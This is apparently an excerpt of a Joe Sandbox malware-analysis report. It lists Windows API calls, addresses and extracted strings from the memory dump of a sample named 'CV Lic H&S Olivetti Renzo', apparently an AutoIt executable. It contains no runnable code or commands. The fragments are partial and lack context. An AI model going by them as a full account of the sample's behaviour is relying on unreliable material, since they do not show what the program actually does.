                                                                                          • Part of subcall function 0039D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0039D1D8
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003E9968
                                                                                        • GetSysColor.USER32(00000012), ref: 003E9982
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 003E9699
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003E96A8
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C52D5
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003C52F4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 003D4DF5
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 003D4E1E
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        APIs
                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003B37A7
                                                                                        • ___raise_securityfailure.LIBCMT ref: 003B388E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                        • String ID: (D
                                                                                        • API String ID: 3761405300-218117518
                                                                                        APIs
                                                                                        • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 003DA88B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: htonsinet_addr
                                                                                        • String ID: 255.255.255.255
                                                                                        • API String ID: 3832099526-2422070025
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003BB7EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 003BB6EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 003BB76C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 3850602802-1403004172
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __calloc_crt
                                                                                        • String ID: "D
                                                                                        • API String ID: 3494438863-842159925
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00380000,00000063,00000001,00000010,00000010,00000000), ref: 00384048
                                                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,003C67E9,00000063,00000000,75C10280,?,?,00383EE1,?,?,000000FF), ref: 003F41B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumImageLoadNamesResource
                                                                                        • String ID: >8
                                                                                        • API String ID: 1578290342-2381723519
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        APIs
                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 003BA63F
                                                                                          • Part of subcall function 003A13F1: _doexit.LIBCMT ref: 003A13FB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message_doexit
                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                        • API String ID: 1993061046-4017498283
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 003FACC0
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003FAEBD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryFreeLibrarySystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 510247158-3257408948
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E86A2
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003E86B5
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003E86E2
                                                                                        • PostMessageW.USER32(00000000), ref: 003E86E9
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461